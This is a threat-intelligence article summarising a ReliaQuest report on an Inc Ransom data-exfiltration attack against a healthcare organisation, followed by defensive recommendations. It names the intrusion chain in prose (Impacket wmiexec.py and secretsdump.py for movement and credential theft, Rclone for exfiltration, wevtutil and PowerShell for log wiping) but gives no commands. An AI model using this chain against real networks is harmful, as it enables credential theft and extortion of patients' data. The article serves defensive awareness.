Inc Ransom Attack: Evolving Extortion Techniques Target Healthcare Sector

While typically known for their double-extortion attacks, which combine data theft with encryption, this latest incident diverged by solely focusing on data exfiltration without encrypting the client's systems.

Inc Ransom Attack: Evolving Extortion Techniques Target Healthcare Sector
The original image was generated by OpenAI's DALL-E and edited by the author. Source: OpenAI (September 2024)

Introduction

In August 2024, cybersecurity firm ReliaQuest uncovered a significant ransomware attack targeting a healthcare client. The attack was attributed to the notorious ransomware group "Inc Ransom." While typically known for their double-extortion attacks, which combine data theft with encryption, this latest incident diverged by solely focusing on data exfiltration without encrypting the client's systems. The breach highlights the group's evolving methods and the persistent threat they pose to organizations across various sectors, including healthcare, government, and education.

Report Overview

Inc Ransom, active since July 2023, is notorious for its sophisticated ransomware campaigns, having extorted an average of 11 organizations monthly. They previously targeted high-profile entities like Xerox and NHS Scotland, often exploiting vulnerabilities like Citrix NetScaler (CVE-2023-3519) to breach systems. This group's attacks consistently apply pressure on victims through ransom notes, even going as far as printing them via compromised network printers.

The August attack followed a clear pattern of progression. Initial access was likely achieved through a firewall vulnerability, allowing Inc Ransom to compromise a service account used for backup management. From there, the attackers used tools like net.exe to gather information on the network and the Impacket module wmiexec.py for lateral movement. They also employed secretsdump.py to extract credentials, further solidifying their foothold in the network.

Once inside, the attackers used Rclone, a popular tool for data transfer, to exfiltrate sensitive SQL database files. To mask their activity, they relied on common utilities like PowerShell and wevtutil to delete system logs, further complicating detection efforts.

Insights and Analysis

The healthcare client faced the immediate threat of sensitive patient and organizational data being publicly exposed if the ransom demands were not met. The potential consequences of such exposure included reputational damage, compliance violations, and operational disruptions. The attackers' use of legitimate tools like Rclone and Impacket made detection more challenging, potentially delaying response times and increasing the attack's severity.

Service account management played a pivotal role in this attack. Service accounts, often overlooked in cybersecurity protocols, are critical targets due to their elevated privileges and broad access across networks. Inc Ransom's exploitation of these accounts allowed them to bypass traditional security measures and execute their attack with minimal detection.

ReliaQuest's investigation emphasized several preventative measures:

  1. Strict Privileged Account Management: Limit service account functions to reduce the attack surface. By assigning specific functions to individual accounts, organizations can better monitor for abnormal behavior and prevent attackers from exploiting broad permissions.
  2. Network Intrusion Prevention: Implement network policies that block domains less than six months old to prevent command-and-control (C2) communications from newly registered malicious domains.
  3. Application Control: Enforce strict application controls, particularly for tools like Rclone, which may have legitimate uses but are frequently exploited for malicious purposes.

Inc Ransom’s latest campaign against the healthcare industry illustrates the evolving nature of ransomware attacks. Their continued use of common tools and their ability to exploit service accounts with broad privileges underscores the need for tighter security controls. By implementing strict account management and enhancing detection capabilities, organizations can reduce their exposure to ransomware threats and mitigate the potential damage caused by groups like Inc Ransom.

References

Inc Ransom Attack Analysis: Extortion Methodologies - ReliaQuest
This report details the various stages of an Inc Ransomware attack intrusion lifecycle, from exploiting a firewall to the use of Windows log manager and PowerShell for defense evasion.